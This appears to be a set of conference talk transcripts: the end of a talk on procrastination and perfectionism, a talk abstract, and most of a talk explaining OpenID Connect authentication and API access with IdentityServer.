You can't read every awesome blog post. You can't go and look at all the news on all the sites. You have to actually deliberately make a choice to ignore stuff. So that can be part of helping your procrastination as well. In terms of actually blocking yourself from going to destructive websites, and I have this problem, I have this weird Facebook tick where it's like I'll be doing something and I'll be like, oh, let me just see what's on Facebook. Like, for no reason. I didn't even like Facebook. I still actually don't like Facebook. And I didn't go on Facebook for like the first two or three years I was on it and never was on it and now I'm like, just like it's weird. Just like this little weird physical tick that I do. So if you don't have any self-control like myself, then you can use a digital aid to help you block stuff. So great website, great apps that you can use. Rescue Time. There's another one called Concentrate, the getconcentrating.com. And then my favorite one actually is Hey Focus, which is Mac only. And what it does is it has a whole list of websites that it won't allow you to go to. And if you do try to go to the website, it puts up this great little like screen that's like and it gives you like some deep Zen aphorism like, well, you know, the monkey mind is the way you know, the path of the dow is and you're just like, oh, okay. And it totally helps you like get right back into the flow. Second thing that you can do if you don't want to get like an app that will go into your system and like know all your business, then you can use some browser extensions. So Leech Block and Iterol are some examples for Firefox and for Google Chrome, Strict Workflow and Stay Focused are also good recommendations. I also, a lot of times it's not just the web that is a distraction, it's our phones. And so you could be like totally hitting it in the flow, working on stuff, and then the phone rings. So you get a text message or heaven forbid, you find out that somebody would get a Twitter notification. When I get Twitter notifications, I actually get both the notification sound from Twitter and a text message sound. So I know that it's actually a tweet and not something else. But that can totally ruin and then of course what the thing is that you're working along, but it'll do, oh, horrible. So I personally, when I'm really trying to like stay focused and I'm trying to like keep all the distractions out, is I will put my phone in airplane mode and if I'm hardcore, I'll just turn it off. Another thing you can do is to manage time through the Pomodoro technique. How many people have used the Pomodoro technique? Awesome. Okay, so the people who haven't, what you do is you think about your time in blocks of 30 minutes. 25 minutes of that is your sprint, completely distraction free, which is why those blocking tools are really helpful and the airplane mode is helpful. Completely distracted free time for 25 minutes working on a particular task. Then for five minutes, you give yourself a break. Now one thing that I didn't say earlier about brainwave modes, one of the easiest ways to go into alpha brainwave mode is to lay down. Being prone actually forces your brain to change brainwave modes. So what I like to do for my breaks when I do the Pomodoro technique is for my five minutes I'll actually lay down in the ground and close my eyes and just breathe for a little bit and try to force my brain to go into a place where it actually does more imaginative and creative thinking. So you can do the Pomodoro technique. There's also something called 10 plus 2 times 5. So a shorter sprint than the 25 minutes. It's a 10 minute sprint, a 2 minute break and you do that five times to equal an hour. And then another thing you can do is you can run a dash time wise or you can fill a quota. So you can say, okay, I'm going to do X number of lines of code or I'm going to do so many sketches or I'm going to write so many paragraphs, whatever it is and then when that quota is done, you're finished. You give yourself a break or if you have the quota for the day, once it's done, no matter what time it is, you stop. And that's really important too. So remember that when you're doing all this stuff, like I said, if you're like doing the Prostination because you've got perfectionism because you've got all this stuff, remember that through this whole process you may slip on the Pomodoro. You may not actually stay focused all of that time, right? But remember that through the whole thing, you're learning through the whole process and there are no mistakes, there's just make, right? There's no fail, there's no nothing. You're just working on making stuff, you're just working on learning and growing and developing and becoming a better person. Now you may be wondering, for that story that I was telling you about, about my book writing, how did it end? What happened? What happened? I'm so curious. So let me tell you what ended up happening. So I started writing the book, or started the process at least, on June 29th, 1999. Yeah, I'm showing you how old I am now. So I ended up finishing the book in February of 2010. Now you may say to yourself, great, you finished a book. But my perfectionist kind of spoke up and was in charge of determining the schedule for myself. And I stupidly told the publisher, yeah, I think I can do it in four and a half months. If you talk to anybody who has written a tech book, they will tell you, which I didn't do, they will tell you, it takes nine months almost across the board. It will take you nine months to write a substantial 250, whatever page book. That's how long it takes. That's how long it takes. Everybody will tell you that. I thought it was going to take me four and a half months because I thought I was superwoman. So when I was done with it in February, I was five months behind. So for me, that was a major fail. And that's one of the reasons why I pulled that six week all nighter, right? Because I was trying to catch up because I was so late. So that was a major fail. However, I did actually end up writing a book and getting it published. So in that respect, I was totally winning. Oh, right, by the way, total aside. When you guys did the power pose, I saw a few people do this. The people who did this, did you know that that is like the universal sign for victory? That blind people will do this when they're feeling triumphant. Did you know that? Isn't that fascinating? So, woo, winning on my book. I have a book. It's awesome. And not only that, but my evil nefarious plan for writing a book actually worked because I actually wrote the book in a lot of ways so I could do this. So I could be in front of you and I could go and go and speak at conferences all around the world. So I mean, the book created all kinds of awesome. Being able to do a TEDx talk in Germany by meeting the organizer on a Monday and the event was on a Thursday and he was like, yeah, I can put you on the roster. I was like, what? Doing my very first starting to do creativity workshops and then starting to keynote conferences which also was part of my dream. So writing the book was amazing even if the process was kind of difficult. So I did this talk just a couple of weeks ago at a conference in Wales called Port 80 and the morning of the talk, I woke up from having a really bad dream. And in this dream, I was driving along in a car with a friend of mine and drove and went over a bump and kind of didn't think a lot about it. I was like, oh, was it? I don't know. And as I was driving away, I looked in the rear view mirror and I found that I had driven over a little girl and that I had hurt this little girl. And instead of taking ownership and taking responsibility for it, I tried to act like it was okay and I kept driving. And then somehow or another, you know how dreams are, somehow or another, not too long after, somebody found out that I was the one that ran over the little girl and then I'm talking to the family and it's just escalating, completely getting out of control. Well, you know, we might have to like book you for vehicular manslaughter and blah, blah, blah. And I was like, oh my God. And when I woke up, I was so relieved to find out that it was just a dream. And I was thinking about it and I was like, what does this mean? What does this dream mean? Why am I having this dream? And then I started thinking about it and I started thinking, oh, that little girl is like my inner child and that when I'm being in perfectionist mode, when I'm being in procrastination mode, when my inner critic is in full regalia and like yelling at me, I'm running over this inner child, this inner creative child that I have and that's what we do. And it reminded me of this excerpt from Alice in Wonderland and I know if you guys are familiar with this where the queen says, I can pay you with jam but it's going to be jam tomorrow or jam yesterday and the girl, Alice is just like, well, I would actually, you know, jam today would be nice and she says, no, it's jam every other day and today isn't every other day. Jam in my mind equals satisfaction, equals completion, equals reward, right? When you're a perfectionist procrastinator, when your inner critic is like in full tilt, you never get the reward, right? You never end up getting jam. You're always pushing it off, pushing it off and then sometimes you end up doing it but it's too late and then you suffered so much already to get to that point, right? So I hope that by sharing my experiences and showing you that there are these alternatives, these actual, you know, practiced, studied known ways to deal with the inner critic, to deal with perfectionism, to deal with procrastination, that you will understand that this creative adult, the creative adult that you could be is the child that survived, the child that didn't get run over by your inner critic, right? And that you'll start to look at yourself differently, that you'll be more forgiving and more gentle and kinder to yourself and that in doing that you'll be able to let yourself have all of those imperfect yet amazing ideas and realize that it's not going to be jam yesterday or jam tomorrow, that it will be, oops, jam today because today is today and it's all we have. So thank you. So I've written several articles on creativity, one on banishing your inner critic, reigniting your creative spark on the list of part, four secrets for enhancing creative productivity and of course the breaking the procrastination, perfectionism, infinite loop. So check those out, connect with me online and have a great rest of the conference. Oops, I'll put it back. Thank you.
Your inner critic is an unconscious deterrent that stands between the seeds of great ideas and the fruits of achievement, keeping you stuck by telling you you’re just faking it, that others have more talent, that you’ll never achieve the success you seek. In this talk, we'll anatomize this pernicious inner force, and learn techniques to banish this critic so that you can have the mental space and energy to let your true talents emerge -- and help you be a badass with your work.
10.5446/50592 (DOI)
Welcome back. Who was in my previous talk? Okay, cool. So we all are already into the subject matter, almost. Again, just a reminder, right after this talk, there's another really interesting talk which is very, you know, close to that subject and that is how to apply this OpenID Connect protocol which I'm going to show you now to do mobile cross app single sign on which is a hot topic these days, yeah, because, you know, when you have several apps on your mobile device installed and authenticate with one, with Google, maybe the other one, shouldn't ask for the password again, things like that. So that's doable and Pedro has done an implementation for that, so that's recommended to watch next if you care about these things. So actually this talk is pretty near and dear to my heart because it's about something that I've been busy with the last six months writing code, yeah. Some of you may know we have this open source project called Identity Server which was an implementation of WS Federation and WS Trust and a little bit of OAuth and a little bit of other stuff. And when OpenID Connect, this new protocol which is really promising became closer and closer to its finalization, so around last December, Brokk and me started, you know, going heads down and hacking code together and we had a point now where I can show it to you, so that's good. It's not done yet, but I can show it to you, I can point you to where you can download it, you can play with it, give us feedback if you want to, if you find bugs, send us pull requests, I'm sure there are plenty. It's not done yet, okay, but it's in the state where I can visualize the concepts. So yesterday evening I did this talk already and I realized, wow, it has become so easy to do authentication and API access now with this new protocol that I don't even need a full hour. So if we have time in the end, please stay here, feel free to ask me questions about anything that you know, you think was missing or that you, you know, want to know more about. Cool. So again, the talk with pretty much two parts, why, why are we doing that and how are we doing it, okay? So let's look a little bit about the current typical application architectures from a security point of view and how they are solved today and what are the problems and how we can improve on that in the future. So I guess the most, the most common scenario is something like this, you have a web application and a human that sits in front of a browser, it talks to your application, it authenticates with your application, yeah, the application brings up a login form or something, you authenticate the user, you make sure he is who he is, you know, give him a cookie and from that point on he's signed in, okay? And whenever this application talks to a some back end service, a very common pattern to use here is just, you know, this back end service doesn't authenticate the user again, right? Because it has already been authenticated by the front end service. So all the back end service cares about is that he trusts the direct caller, right? It already has done the authentication, that's the way it works in many scenarios, yeah? And that is what we call a trusted subsystem, right? The service trusts its caller, the caller has authenticated the user, so the front end acts on behalf of the user. Now you know it's not 1980 anymore and we are not animals here, so we don't do authentication anymore in our own applications, right? We're using security token services or identity providers, yeah? So in other words, the application is doing application stuff, yeah? And we have a separate service in our network often called the security token service and identity provider, there are many names for it, which has only one job, authenticating the user and giving him back a security token, okay? So the way this works is this, we go to our token service, authenticate the user, the user gets back a token, he sends the token to the application, the application validates the token, makes sure it's coming from a trusted source, gives the user a cookie and from that point on, the user is authenticated. And again, if this application talks to a back end service, very often this back end service doesn't care about the token itself or this user, it cares about that it trusts the direct caller and the direct caller does work on behalf of that authenticated user, okay? And then essentially we have expanded the trusted subsystem over to our identity provider, okay? So that is one type of application that people are building. Then on the other hand, oh sorry, yeah, I should have mentioned, and the protocols we do, we use today for doing that are very often either SAML2P or WS Federation. Who is using SAML2P in this room? Yeah? And who is WS Federation? Okay? So yeah, SAML2P is a protocol that was, you know, designed a long time ago. I have water already, thank you. Yes? So SAML2P was designed for exactly these use cases, right? Web single sign on across many web applications and it's, you know, it's been around for quite some time. WS Federation is the Microsoft equivalent, yeah? Like if you're living in Microsoft land, they prefer WS Federation. It's solving more or less the same problems as SAML2P does. And the issue is if you have, you know, if your applications consist of cross-platform like one parties.net and one parties Java, on the Java end of the world, people do SAML2P on the WS Federation end of the world, sorry, on the.net framework end of the world, they use WS Federation. And they don't like each other pretty much, yeah? There are not really good SAML2P libraries for.net or they are commercial or propriety and it's vice versa. And if you have PHP and Node in the mix as well, then it gets even more complicated, yeah? Yes. The other type of application that people build are what we call delegated access or delegated API access where actually a user, for example, uses this application here. The application authenticates the user, but the back end service this application tries to call on behalf of the user does not trust its direct caller, okay? So let's say, for example, you're building a web application where users can log in and you provide a service where you can, you know, like do statistics over their Twitter account, like how many retweets do you have, how many followers, how many unfollowers. Twitter doesn't trust your application, right? Why would they? They don't know you, yeah? Who they trust is the user because the user has a trust relationship with Twitter because he has a Twitter account, okay? So there is no direct trust between the caller and the service. And if we think about mobile devices, yeah, where the application actually runs on the client and not in a browser which comes from a server, then this trust boundary is expanded down to the client, yeah? So why would Twitter directly trust an arbitrary application running on your phone, okay? And the way we solve these problems today is, again, by introducing a security token service. And this time it's often called an authorization server. And again, the pattern is very similar. The user goes first to the security token service, authenticates with the service, gets back an access token, and now this access token can be used to access that API, okay? Either like this or from a client device like this. And the trusted subsystem now essentially looks like this, okay? And again, there are protocols out there that were made for solving that problem, yeah? So if you're like living in the soap world, it's called W's trust. Or if you are living in, you know, the modern world, it's called OAuth 2, yeah? And again, they have very specific use cases, namely being able to do this requesting a token. So an application often called a client can act on behalf of a user via a potentially untrusted third party, okay? Your phone is untrusted by default or by design even, yeah? So life would be good and we would have pretty good solutions for that if these scenarios would never occur to be, you know, in combination, right? So if we are in this world, we use OAuth, we use OAuth. In the other world, we use W's Federation Assemble to P and they never ever, you know, touch each other, these two scenarios. But when they do, then suddenly we have two protocols, yeah? One like, like SAML, one like OAuth, which come from even two different decades, yeah? Which work totally different and you have to kind of combine them together and that doesn't really work that well. All the time, especially since, you know, like SAML and W's Federation are based on XML and SAML, there's a SAML token type and all these heavy standards like XML, digital signatures, XML encryption, which is hard to deal with if you don't have like a library like the.NET framework or some Java library, yeah? But not JavaScript, for example, which is an important target, yeah? So what's wrong with SAML, yeah? I already mentioned it. It's old, yeah? It wasn't designed for the modern use cases like delegated API access, yeah? And there's a guy called Craig Burton, he's an identity analyst and, you know, you typically shouldn't trust these people but he had a nice quote which kind of totally tells it, yeah? SAML is the Windows XP of identity, which, you know, people use it, it kind of works, it works for the use cases that Windows XP was designed for 10 years ago or even longer, I can't even remember, yeah? But it has no future, okay? Which doesn't mean that SAML isn't useful, I mean, SAML is widely used, especially in Scandinavia, all the e-government stuff, your bank ID that you all love, yeah, is implemented using the SAML protocol, okay? So it's not bad, it's just it has no future anymore, especially with devices which don't have an XML parser anymore, yeah? Figure that. So we need something new, a replacement for SAML, okay? Now what's wrong with Oof? Well, some people would say there are many things wrong with Oof, yeah? But in essence, this picture says a lot about what's wrong with Oof. Oof was designed for a really specific use case for requesting access tokens for services. But companies like Facebook and Microsoft and Google turned into an authentication protocol. They're like, log in with Google, log in with Facebook, yeah? And they said, we're doing Oof, but they're lying. Oof is not an authentication protocol. They made custom extensions to Oof to add, to teach it some tricks to do authentication, yeah? And guess what? They all came up with their own custom extensions of that, yeah? Facebook, Google, no way. Oh, that was seamless. Yeah? So in other words, they all wrote their little version of Oof, okay? And you know, that's why there are things like this Oof I.O. library there, which says we support 50 plus providers, we support Facebook and Google and you name them. Why? Because they all work differently, okay? But what we really want is, we want a protocol with which you can authenticate users and it should work the same for all of the identity providers out there, yeah? Like Microsoft shipped this thing called Katana and their shipping is authentication middleware in there, like how to authenticate users. And they have one middleware called the Google authentication middleware and one is the Facebook authentication middleware and the Twitter authentication middleware and the Microsoft authentication middleware, where in essence, you only want one, right? And you say, like, okay, here's the code to do authentication, use Twitter, use Microsoft, use our corporate STS, use the business partners STS, okay? So that is what's wrong with Oof that basically it got turned into a big mess by these companies. And this is where OpenID Connect comes in really, yeah? The OpenID Connect is, so when you go to the website, it says like it's a simple identity layer on top of Oof. Whenever you hear the word simple, be careful, okay? The rest is totally true. It's a layer on top of Oof, so they took the protocol Oof, which on its own is okay. It was designed for the modern application scenarios in mind to start with, right? It was designed for mobile applications. It was designed for JavaScript based applications, for example, and it can work on desktop applications and server based applications equally well. So why not use that and add, you know, look at and add the authentication feature to it, but do it in a standardized way, okay? And by having many eyes looking on how they do it, hopefully we don't do the same silly mistakes as the others like Facebook who, you know, created buggy implementations, okay? So what is OpenID Connect? What does it add on top of Oof? And the first thing, and that's the most important one, it defines so-called identity tokens. So I said earlier, Oof is a protocol to request access tokens, right? An access token is something that you send to a service to get access to that service. And an identity token is something that you send to an application so the application can validate that the user is legitimate. Completely different use cases, okay? And so they define the concept of an identity token. Now to make identity tokens useful, they must be standardized, right? I mean, your application should be able to validate this identity token coming from an OpenID Connect provider. So they using the JSON Web token format which turns out, you know, is pretty widely used these days and that was the obvious choice, okay? JSON Web tokens have a number of advantages, they are compact on the wire, they are JavaScript compatible and amongst other things. They define standard choices for cryptography how to protect these identity tokens, yeah? You don't want, you know, like Google does their own weird algorithm and Facebook uses some standard and Microsoft uses a standard plus some weird extension to it, yeah? So you want to have a set of crypto algorithms that you on your client side or on your application side can use to validate these tokens and they give you a number of choices here but they all are pretty, you know, sensible. They define how to validate identity tokens, yeah? Because obviously you still have to do some work to authenticate a user and they tell you exactly in the spec to this, to this, to this, to this and if you're done with step number six then the user is authenticated, okay? They define so-called scopes. We'll talk about scopes in a second for all those who were in my previous talk. You know, scopes are identifiers for services and they are service-defined and OpenID Connect defines a set of scopes which are part of the spec so you have a common set of scopes. And that's a very, very important point here. They take the authentication features from SAML and WSFET. They take the API access features from OAuth and combine them into a single protocol. So you know, you now can do authentication and API access with a single protocol and even better with a single round trip to a server. It's not like doing WSFET on the first leg and OAuth on the second. It's a single protocol now which does both. And that is defined how it should work for different types of applications, okay? So when you go to the OpenID Connect website, that's how it looks like. So that's simple for you. There are a number of specifications involved, yeah? There are the underpinnings which is the whole OAuth protocol or OAuth framework actually. There are JSON Web tokens, JSON Web token signatures, JSON Web token encryption. Webfinger is for discovery. I'll show you that in a second. But you typically don't care about these things because there are libraries out there which does that. They are creating tokens, validating tokens and so on. What you care about is this thing called minimal in this box here. This is what you need to do to connect your application to an OpenID Connect provider, yeah? And as you will see, and that's the nice thing about OpenID Connect, what you have to do to do that is really minimal, okay? It's very easy. Then there are some other specs, you know, satellite specs like discovery which is about metadata. I'll show you that as well. How to register applications, how to do session management like log in, log off, yeah? I mean, many people used OAuth for authentication but OAuth didn't even have the notion of a log off, yeah? I mean, many people thought, okay, log in is done, I'm done. Log off is harder. Anybody who tried to do federated sign out over many, many computers knows that it's a hard problem to solve. Okay. So, the next thing that OpenID Connect defines are so-called flows. And flows, as I mentioned in my previous session, are basically just patterns how different types of applications connect to an OpenID Connect provider. And since in OpenID Connect, there are always humans involved, yeah? There are actually less flows than in OAuth, yeah? Only the flows that, you know, involve humans with login pages and all these things are actually present in OpenID Connect. So, the implicit flow is for basically for applications running on a native platform, browser-based applications. And the authorization code flow is for applications running on a server, okay? Since applications that run on a server can also do client authentication and with clients, I always mean like, clients are the code that your users run, yeah? So, users and clients are different things. You can step up security with some extra features which we'll talk about later. And that's the hybrid flow. The hybrid flow is for applications which one part lives on the client device, they're maybe like a native application on the mobile device, and one part lives on the server. So, maybe, you know, you initiate the authentication process on the client showing UI and all that stuff. And once you're done, you transfer some of the tokens to the back end and then do something on the back end. And that's, you know, for in-between scenarios. We don't look at that because, you know, once you understand the first two flows, it's easy to see how hybrid works. Cool. So, I want to do a couple of excursions, yeah? Like explain to you some of the concepts that OpenID Connect brings on the table. And the first excursion I want to do is endpoints. So, OpenID Connect defines three endpoints that an OpenID Connect provider must implement, okay? One is called the authorized endpoint. And this is always when a human is involved. When you redirect a user to an OpenID Connect server, when you show a login page, for example, that is handled by the authorized endpoint, okay? It shows UI. The token endpoint is an API endpoint. This is where you programmatically can go to and request tokens or renew tokens, for example, or revoke tokens even, yeah? So that is for programmatic access. And the third thing that they specify is the so-called user info endpoint. And the user info endpoint is, think of it as a profile service, yeah? So let's say you are authenticating a user and you want to know his email address. The email address might not be in the token itself because you want to save space on the wire, but you can go to the user info endpoint and say, hey, here's the token, give me back the email address. Or give me back his first name, last name, profile picture. Stuff like that, yeah? Again, all of these Facebooks and Googles, they have this user info endpoint, but it was propriety what data format they returned. User info endpoint defines the data format so that it's interoperable, okay? Cool. So let's talk about the simplest use case of OpenID Connect, which is a web application that wants to authenticate a user that is coming in via a browser, okay? That's the, if you like, the SAML2PWS federation replacement, yeah? So the way this works is the web application redirects the user to the OpenID Connect authorized endpoint, that's the thing that shows the UI, yeah? And it constructs a number of query strings and that is part of the OpenID Connect specification, yeah? So it says, hey, I'm client app one, yeah? Clients have to pre-register with the OpenID Connect provider, just like in SAML or WSFET as well. I want to authenticate the user and that is the first scope that was standardized. Whenever you add the OpenID scope to a request, that means I want to authenticate the user, okay? And in addition, I want to know his email address, okay? That's the scope here. And when you're done, please send me the identity token back to this pre-registered URL, okay? So when app one got registered, it said, okay, that's my legitimate redirect URI, okay? What do you want to have back? An identity token and how should I send it back to you via a form post, okay? So now what happens is, sorry, the scopes here that you can see here are profile, email, with an email address, phone and offline access, these are the ones that are defined by the specification, yeah? And they map to claims that you can get back from the user endpoint like name and family name and given name and nickname and many names. Email address or email verified means is the email address verified by the provider, for example, did they do a proper email verification, things like that, okay? So now what happens is the user has to authenticate with the OpenID Connect provider and then, and that is basically an OAuth concept and is optional based on the application you're writing, the user is asked like, hey, there's this application here called, in that case, implicit client and it asks for your email address, are you okay with releasing that identity information to a third party, okay? And in our implementation, you could uncheck that and then the claim email wouldn't travel back to the application, for example, yeah? You can also turn off this screen, yeah? I mean, WS Federation and SAML2P didn't have that screen at all, so if you don't want that, turn it off and basically the lock-in screen is all they're gonna see. And then, as the last step, the OpenID Connect provider will send back the identity token via a form post, yeah? So it posts back via the client's browser back to the client. And that's again exactly how SAML2P and WS Federation worked, but it's much, much simpler now because the only thing they're sending back is basically a form with a hidden input field, the name of the field is ID underscore token and the value is your JSON web token, okay? And why does it post back? Because I asked them to do so, right? And there was the response mode was set to form post. There are other response modes and you will see them later how they look like. Okay, so what I did is basically to kind of prove my point is I wanted to write an OpenID Connect client, yeah, without using any framework, yeah? Just plain.net to see how much work it would be to connect to the OpenID Connect provider, okay? I mean, the only thing you really need is a JSON web token library to validate the tokens, yeah? So what you have to do is, yeah, like in code is you create two values here. One is called the state and one is called the nonce. A nonce is a number used once, yeah, so they're both random numbers, yeah? And they are both being sent to the OpenID Connect provider. When the provider responds back to the client, the state will be on the URL, so they echo back the state on the response URL and they put the nonce inside of the identity token. And that is done to make sure that when you get the response back, it was exactly the response that correlates to your original request, okay? Otherwise, I could try sending you bogus tokens and, you know, something could go wrong, okay? So the next thing is a little helper, okay? That's a helper, which basically takes the endpoint of the authorized controller. I pass in my client ID. I pass in what I want to get back in identity token. I say I want to authenticate the user. I want his email address. I tell them where to send the token back to. I pass in the state. I pass in the nonce and I tell them please do a form post back to me, okay? Then I store the state and the nonce locally in the cookie so I can, when the response comes back, I can grab them and make sure they are valid, okay? And then I do a redirect to the server, okay? Now, when the server is done, it will call me back on the sign-in callback URL. So what I do is I get the identity token from the form. I get the state from the form. I make sure the token is valid and the exact procedure for that is like this. I first retrieve my state and my nonce back from my cookie. If that cookie is not there, it's invalid. I make sure the state matches the state parameter I got back. If that not matches, it's invalid. Then I use the Chaud Security TokenHandler class from Microsoft in this case to validate the JSON WebToken and what you need to make sure is that the audience that you expect inside the token is your own client ID. And that is very, very important, yeah? You are a client with a name. You ask for a token. When the token comes back, you must make sure that the audience inside the token is actually you and not some other application, right? Otherwise you could be receiving tokens which you haven't asked for. The issuer, the name of the OpenDeconnect issuer, that's a URL, and here's the public key that I use to validate the signature on the token. Then I call validate token and then I get the nonce claim inside the token, make sure it matches my stored nonce and then I get rid of the temp cookie and I return the claims back to my application. Okay? Pretty simple. And then once the token is validated, I have my claims here. I create a new claims identity and I sign him in with my local cookie. Okay? So that's all the code you would have to write if you would have no single framework that would implement a protocol for you. And that's pretty cool because that code can be written on arbitrary platforms, PHP, Node.js, whatever, Java, and so on. You don't need something special for it. Okay, cool. So let's try that. Here's an identity server. The way we architected it, an identity server is now as so-called OVN middleware. So you can host that inside of your existing application as a separate application. You can host it outside of IIS, inside of IIS as an anti-service on the command line as I'm doing right now. Yeah? All the hosting code is more or less this here. Okay? Which is easy, it's great for testing. Let's run that application. Okay? So when I click the sign in link, I initiate the round trip to the server. Here's my login page. I log in with Alice. I click login. And I have configured consent for this application. So I will see the consent screen. So it says, okay, hello, Alice. Here's the application. It wants your identity, your user ID, and your email address. And should I ask you again next time or do you want me to remember this decision? Okay? And then I basically just print out the claims of my local claims identity after I signed in the user using a cookie. Okay? And you can see what was in the token here. There's the issuer, there's the audience, the not-before, the expiration, the nonce that I talked about earlier, issued add. Yeah? When was the token issued? What's the name of the user? The authentication method reference. So how did the user authenticate with the server? When did he authenticate with the server? And here's the email address I asked for. Okay? And when I'm done, I can say sign out, which means I basically go back to the identity provider on a special link, on the sign out link, and that's, this will basically clear the cookie on the identity provider. Okay? Like this. And now I'm locked out again. So that's how it works. It's pretty simple. Yeah? That's the identity token that we've got back. It's a JSON web token. As I mentioned, basically you see the claims are just key value pairs, JSON encoded. On the top, you see a header. Then basically they take the header, base 64 encoded, take the claims, base 64 encode them, put them into a string, and then take the signature over that string, and append the signature as base 64 encoded in the end, and that's what they send back over the wire. Okay? So that's the other excursion. The next excursion I want to show you is discovery. So you've seen that my code needs to know quite some things, right? It needs to know where is the authorized endpoint, which key material is used, what's the issuer name, where is the logout endpoint, yeah? And OpenRD Connect specifies this thing called the discovery document, and this is basically a JSON document that tells the client where all of these things are. Okay? So there's a URL that is specified by the specification. It's localhost, core. It's dot well minus known slash OpenID minus configuration. Okay? And when we look here, you see things like what's the name of the provider, where's the authorized endpoint, where's the token endpoint, where's the user info endpoint, where's the logout endpoint, which scopes do we support, which response types do we support, which response modes, yeah? We've seen form post that is supported. We also support other response modes and so on. Oh, and which algorithm are we using to sign the token? And that's again is RSA with chart with 256. And also what you get is when you follow this link here, that is the public key that we use to sign the tokens. So again, the client can discover that information automatically. Which means that you can write more clever code than the code I wrote, yeah? So there's the OpenID connect middleware from Microsoft, which will ship in Katana version 3, yeah, which is due to mid of, mid summer, they said. And all you need to configure really is now, what's your client ID? Where is the base address of the authorizations as server or the OpenID connect server? Where do you want to get the token sent back to? What do you want as a response ID token or token and what scopes do you want to use? Okay, let's get rid of token. And that's all you have to configure now, yeah? Because now what happens is that this middleware goes to this base address, appends this dot well known slash OpenID connect configuration URL, passes the document and auto configures itself. Okay? And once it's done with the OpenID connect handshake, it will use the locally configured cookies middleware, this one here, to sign the user into my application. No? Which also means that you don't have to do anything special to initiate the whole process, right? The only thing you really need to do is have an action method here which has the authorized attribute, which means, okay, we're going to create a 401, the middleware will catch the 401, turn it into a 302, going to the authorization server. So let's do this, and again, you see, oh, wrong, Alice, and Alice, and we are back. This time no consent, why? Because we have consented before and I clicked the remember decision checkbox. Okay? And again, sign out works the same. We come back here and we are signed out. Any question so far? Does it make sense? Is it hard? Is it harder than WS Federation? No, it isn't. So it's an improvement, right? That's I guess the main point here. Yes? Okay, so what the question is, what's the adoption look like? So the protocol has been released, the spec has been released on February 26, 2014. So that kind of answers the question, yeah? No, there are a number of products already in libraries and I will show them to you later. There's a list basically where you can look for, you know, commercial products and open source libraries and so on. Okay? So let's do the same thing now, but we're not writing a web application, we are writing a native application or a JavaScript-based application running in the browser like, you know, like a phone gap application or something like that, yeah? And you know what? It looks exactly the same and I guess that's the desired outcome here, right? It says, hi, my name is client app one, yeah? I want to authenticate the user that that's why as I pass you an open ID, I want to get back the email address. Now, since this is a native application in that example, there's a special URI, you know, that that's up to you really, but many people use this OOB colon slash slash for out of the box. So it's something that is installed on your local device, yeah, like a native app. And again, I want an ID token. Something's missing, the response mode is missing. Obviously, for native applications, form posts don't make a lot of sense, right? So we don't say form post here and if you omit the parameter, it basically says call me back directly, okay? And the response looks like this and that's also pretty simple. Yeah, so the login occurs, the constant screen occurs if enabled. After all that, the identity token gets produced by the server and then it gets sent back on the callback URI, okay? So if your application is a JavaScript application in the browser, that is basically some endpoint on a server, yeah, that will receive that. If your application is a native application on a client device, you typically have a web view, yeah, like an embedded browser, and then you just catch that redirect URI and then you pull the identity token from the URL. So let me show you that as well. Let's do a native first. Yeah, login or login with profile maybe, doesn't matter. So that's an embedded browser now, yeah, showing the login page. I login with Alice and here's the constant screen, I say yes, and now that's the return URL and as you can see, here's my identity token, okay? How does that work in code? You see I have a separate window here, the login web view and this has just one control called the web browser, yeah, and then basically you can handle the navigating event and whenever you see your callback URI being the next URL, yeah, here with if E.urrite.txt thing starts with, you know, authentication is done and you can now grab the identity token from the URL and that is how it manually works. Again, that there are many operating systems have built in libraries like Windows 8, has the web authentication broker, Android has a native library for that and to make that easier, okay? But that's how it in practice works and the nice thing is obviously that the application is not involved at all, right? I mean, they are the only thing the application knows is that's the URL to go to and whenever they call me back on this URL, they are done and what's happened in between, we don't care. So login only, we could also login with Google now. The application doesn't care about that but now we have an identity token that basically got sourced from a Google account, no? Okay. So the next thing which is an important feature is now that we have authentication done, right? So that was our WSFETS SAML replacement. Now the next part is how do we do now API access? Yeah, so I mean, some applications might not care about that, some might only care about API access but what OpenID Connect allows us to do both at the same time, yeah? And the only difference you have to do is really and that's quite nice is you have to ask for more scopes, okay? OpenID defines a set of identity related scopes and you can define a set of scopes that relate to your APIs, okay? So what that basically means is I want to authenticate the user, I want this email address and I want an access token for API, I want an API too, okay? And you also say give me back an ID token and give me back a token. And then once we have the access token on the client, we can use it, oh, sorry, and they send us back like this, like there's the identity token and there's the additional token here, okay? So we now have two tokens, yeah? One is for authenticating with the client, one is for accessing the API backend. And then we can just use the token, put it on your authorization header, for example, and access the backend service. So let me show you that as well. So here we do login with profile and access token, let's stay with this client here. So let's use another, no, it doesn't matter really. So now you see the constant screen says, okay, here are some scopes related to your identity, yeah, like your user ID and your basic profile. And here are some scopes which relate to API access on your behalf, okay? And we can say allow. And now what we get back is an identity token. And if I can find it somewhere, an access token, okay? And we get told how long this access token is valid and so on, okay? So we can also look at the access token. Now what's inside of that? Basically there's the issuer again, the audience, which this time is not the client but the backend, which makes sense, right? The not before, the expiration, the client ID, the scopes that the user has consented to, yeah? The subject ID again, the authentication method, this time it's external since it's coming from Google and the authentication time. And this is what you would use then to send to your backend service. How does the backend service look like? Here's my startup. So there's middleware for validating JSON web tokens, yeah? So we say, okay, we want to make sure this token comes from this issuer, has this audience and was signed with this public key. And as long as this is true, we can now access the service backend with this token. So let's try that as well. Okay? And again, what this service is doing is really just it grabs the current user principle, which has all the claims that were on the access token and echoes them back so we can see that it actually worked. So when we go to our call service button here now, you'll see that we get back our claims from the service. And again, how did it work? We just added the access token to the authorization header and send it along. Cool. Oh, the same thing that we just seen maybe in JavaScript. Where is it? Yeah. So it's the same client as the WPF client, yeah? We can say login only, for example, so we only want to authenticate the user. I'm too lazy. Okay? So that gives us back the identity token. Now, again, there are libraries for JavaScript that allow you to validate the JSON web token, make sure the signature is valid and all these things. So the user is authenticated with the client, yeah? Or we log in with profile and access token, yeah? We get a different consent screen, yes, allow. And now we have two tokens. And again, same purpose, you first validate the identity token, then you take the access token and send it to your back end to get access to the service on behalf of the user. Okay. The last thing that the last scenario I want to show you is how about long-lived API access, yeah? So now what we've seen is we asked for two tokens, right? One was the identity token, one was the access token, and the access token has a finite lifetime, yeah? I mean, it's totally up to you. You can make it live for 10 minutes, for one hour, for one year, whatever, yeah? Obviously, as you know, the longer the access token lifetime, the more is the exposure of that token, you know, someone could lose his device and it's on there, it's valid forever, stuff like that. But there's basically a way to get long-lived access without the token, without having to issue very long-lived access tokens, and this is called refresh tokens. And again, for everybody who was in my OAuth talk, that's a concept from OAuth, that's nothing that 